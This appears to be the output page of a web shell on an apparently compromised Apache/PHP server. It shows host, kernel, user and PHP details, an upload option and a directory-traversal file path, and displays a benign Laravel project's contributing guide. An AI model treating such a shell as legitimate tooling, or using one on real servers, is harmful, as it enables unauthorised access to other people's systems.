( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/tmpr/..//tmpr/..//tmpr/../tmpr/../n8nphp/CONTRIBUTING.md
# 🤝 Contributing

**Contributions are welcome! If you have a feature request, bug report, or improvement:**

1. **Fork the repository**

2. **Create a topic branch:**
   Choose the prefix that matches the purpose of your work:
   * `feature/your-description` – new functionality
   * `bugfix/your-description` – fix for an existing issue
   * `hotfix/your-description` – urgent production fix

3. **Run Laravel Pint to ensure code style is consistent**`composer pint`
4. **Add or update tests and make sure they pass** `composer test`
5. **Commit your changes**`git commit -am "Add: my awesome addition"`
6. **Push to your branch** `git push origin feature/my-awesome-addition`
7. **Open a pull request**

Please adhere to laravel pint and include tests where applicable.